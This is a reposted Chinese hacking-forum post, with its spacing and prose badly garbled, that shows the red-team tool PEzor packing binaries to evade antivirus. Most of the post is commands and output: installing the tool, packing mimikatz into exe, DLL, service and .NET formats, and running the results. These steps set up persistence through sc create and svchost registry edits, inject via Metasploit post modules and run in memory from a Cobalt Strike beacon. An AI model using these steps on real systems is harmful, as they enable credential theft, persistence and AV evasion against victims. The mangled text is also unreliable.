设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 护网 [21867] 2021-04-13_红队的最新一款绕过AV的PE工具 ...
返回列表 发新帖
查看: 2|回复: 0

[21867] 2021-04-13_红队的最新一款绕过AV的PE工具

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 5 天前 | 显示全部楼层 |阅读模式
2021-04-13_红队的最新一款绕过AV的PE工具 A V P E L e m o n S e c   2 0 2 1 - 0 4 - 1 3         h t t p s : / / g i t h u b . c o m / p h r a / P E z o r , e x e s h e l l c o d e A V K A I L M i n g w - w 6 4 L L V M   /   C l a n g 使 P E z o r h t t p s : / / g i t h u b . c o m / E g e B a l c i / s g n 1 b a s h P E z o r e x p o r t P A T H = $ P A T H : ~ / g o / b i n / : / h o m e / k a l i / P E z o r : / h o m e / k a l i / P E z o r / d e p s / d o n u t _ v 0 . 9 . 3 / : / h o m e / k a l i / P E z o r / d e p s / w c l a n g / _ p r e f i x _ P E z o r _ / b i n / $   g i t   c l o n e   h t t p s : / / g i t h u b . c o m / p h r a / P E z o r . g i t $   c d   P E z o r $   s u d o   b a s h   i n s t a l l . s h $   b a s h   P E z o r . s h   - h
2 h t t p s : / / g i t h u b . c o m / E g e B a l c i / s g n P E z o r
m i m i k a t z e x e D L L e x e #   g e n e r a t e $   P E z o r   - f o r m a t = e x e   m i m i k a t z . e x e   - z   2   - p   ' " t o k e n : : w h o a m i "   " e x i t " ' #   e x e c u t e C : >   . m i m i k a t z . e x e . p a c k e d . e x e #   g e n e r a t e $   P E z o r   - f o r m a t = d l l   m i m i k a t z . e x e   - z   2   - p   ' " t o k e n : : w h o a m i "   " e x i t " ' #   e x e c u t e C : >   r u n d l l 3 2   . m i m i k a t z . e x e . p a c k e d . d l l , D l l M a i n
D L L r e f l e c t i v e - d l l #   g e n e r a t e $   P E z o r   - f o r m a t = s e r v i c e - e x e   m i m i k a t z . e x e   - z   2   - p   ' " l o g   C : / U s e r s / P u b l i c / m i m i . o u t "   " c o f f e e "   " e x i t " ' #   e x e c u t e C : U s e r s P u b l i c >   s c   c r e a t e   m i m i s e r v i c e   b i n p a t h =   C : U s e r s P u b l i c m i m i k a t z . e x e . p a c k e d . s e r v i c e . e x e [ S C ]   C r e a t e S e r v i c e   S U C C E S S C : U s e r s P u b l i c >   s c   s t a r t   m i m i s e r v i c e S E R V I C E _ N A M E               :   m i m i s e r v i c e                 T Y P E                               :   2 0     W I N 3 2 _ O W N _ P R O C E S S                 S T A T E                             :   4     R U N N I N G                                                                 ( S T O P P A B L E ,   N O T _ P A U S A B L E ,   A C C E P T S _ S H U T D O W N )                 W I N 3 2 _ E X I T _ C O D E         :   0     ( 0 x 0 )                 S E R V I C E _ E X I T _ C O D E     :   0     ( 0 x 0 )                 C H E C K P O I N T                   :   0 x 0                 W A I T _ H I N T                     :   0 x 0                 P I D                                 :   9 1 3                 F L A G S                             :   0 x 0 #   g e n e r a t e $   P E z o r   - f o r m a t = s e r v i c e - d l l   m i m i k a t z . e x e   - z   2   - p   ' " l o g   C : / U s e r s / P u b l i c / m i m i . o u t "   " c o f f e e "   " e x i t " ' #   e x e c u t e C : U s e r s P u b l i c >   c o p y   / y   m i m i k a t z . p a c k e d . e x e . s e r v i c e . d l l   % S y s t e m R o o t % S y s t e m 3 2 S v c H o s t D e m o . d l l                 1   f i l e ( s )   c o p i e d . C : U s e r s P u b l i c >   s c   c r e a t e   S v c H o s t D e m o   b i n p a t h =   ^ % S y s t e m R o o t ^ % " S y s t e m 3 2 s v c h o s t   - k   m y g r o u p "   t y p e =   s h a r e [ S C ]   C r e a t e S e r v i c e   S U C C E S S C : U s e r s P u b l i c >   r e g   a d d   " H K L M S Y S T E M C u r r e n t C o n t r o l S e t s e r v i c e s S v c H o s t D e m o P a r a m e t e r s   / v   S e r v i c e D l l   / t   R E G _ E X P A N D _ S Z   / d   ^ % S y s t e m R o o t ^ % S y s t e m 3 2 S v c H o s t D e m o . d l l   / f T h e   o p e r a t i o n   c o m p l e t e d   s u c c e s s f u l l y . C : U s e r s P u b l i c >   r e g   a d d   " H K L M S O F T W A R E M i c r o s o f t W i n d o w s   N T C u r r e n t V e r s i o n S v c H o s t "   / v   m y g r o u p   / t   R E G _ M U L T I _ S Z T h e   o p e r a t i o n   c o m p l e t e d   s u c c e s s f u l l y . C : U s e r s P u b l i c >   s c   s t a r t   S v c H o s t D e m o S E R V I C E _ N A M E               :   S v c H o s t D e m o                 T Y P E                               :   3 0     W I N 3 2                 S T A T E                             :   2     S T A R T _ P E N D I N G                                                                 ( N O T _ S T O P P A B L E ,   N O T _ P A U S A B L E ,   I G N O R E S _ S H U T D O W N )                 W I N 3 2 _ E X I T _ C O D E         :   0     ( 0 x 0 )                 S E R V I C E _ E X I T _ C O D E     :   0     ( 0 x 0 )                 C H E C K P O I N T                   :   0 x 0                 W A I T _ H I N T                     :   0 x 7 d 0                 P I D                                 :   1 8 2 3                 F L A G S                             :   0 x 0
. N E T D L L #   g e n e r a t e $   P E z o r   - f o r m a t = r e f l e c t i v e - d l l   m i m i k a t z . e x e   - z   2   - p   ' " l o g   m i m i . o u t "   " c o f f e e "   " e x i t " ' #   e x e c u t e m s f 5   >   u s e   p o s t / w i n d o w s / m a n a g e / r e f l e c t i v e _ d l l _ i n j e c t m s f 5   p o s t ( w i n d o w s / m a n a g e / r e f l e c t i v e _ d l l _ i n j e c t )   >   s e t   P A T H   m i m i k a t z . e x e . p a c k e d . r e f l e c t i v e . d l l m s f 5   p o s t ( w i n d o w s / m a n a g e / r e f l e c t i v e _ d l l _ i n j e c t )   >   s e t   W A I T   1 0 m s f 5   p o s t ( w i n d o w s / m a n a g e / r e f l e c t i v e _ d l l _ i n j e c t )   >   r u n #   g e n e r a t e $   P E z o r   - f o r m a t = d o t n e t   m i m i k a t z . e x e   - z   2   - p   ' " l o g   m i m i . o u t "   " c o f f e e "   " e x i t " ' #   e x e c u t e m s f 5   >   u s e   p o s t / w i n d o w s / m a n a g e / e x e c u t e _ d o t n e t _ a s s e m b l y m s f 5   p o s t ( w i n d o w s / m a n a g e / e x e c u t e _ d o t n e t _ a s s e m b l y )   >   s e t   D O T N E T _ E X E   m i m i k a t z . e x e . p a c k e d . d o t n e t . e x e m s f 5   p o s t ( w i n d o w s / m a n a g e / e x e c u t e _ d o t n e t _ a s s e m b l y )   >   s e t   W A I T   1 0 m s f 5   p o s t ( w i n d o w s / m a n a g e / e x e c u t e _ d o t n e t _ a s s e m b l y )   >   r u n
C o b a l t   S t r i k e   I n t e g r a t i o n C o b a l t   S t r i k e h t t p s : / / g i t h u b . c o m / p h r a / P E z o r / b l o b / m a s t e r / a g g r e s s o r / P E z o r . c n a L e m o n S e c #   c o n v e r t   a n d   e x e c u t e   r e f l e c t i v e   D L L b e a c o n >   e x e c u t e - i n m e m o r y   - f o r m a t = r e f l e c t i v e - d l l   m i m i k a t z . e x e   - z   2   - p   ' " c o f f e e "   " e x i t " ' #   c o n v e r t   a n d   e x e c u t e   . N E T   a s s e m b l y b e a c o n >   e x e c u t e - i n m e m o r y   - f o r m a t = d o t n e t   m i m i k a t z . e x e   - z   2   - p   ' " c o f f e e "   " e x i t " '

回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:29 , Processed in 0.601118 second(s), 29 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表